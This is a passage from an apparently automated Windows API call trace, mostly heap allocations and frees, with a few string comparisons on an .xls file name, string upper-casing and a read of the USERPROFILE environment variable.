1 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2a69760 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sn-hlisepFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n-hlisepFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-hlisepFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hlisepFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lisepFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="isepFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sepFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="epFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oxRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xRII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RII.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="II.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6108 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6108 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.828] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0150.828] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0150.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0150.829] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0150.829] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0150.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0150.830] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0150.831] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0150.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0150.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0150.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0150.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0150.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0150.833] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0150.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0150.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0150.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 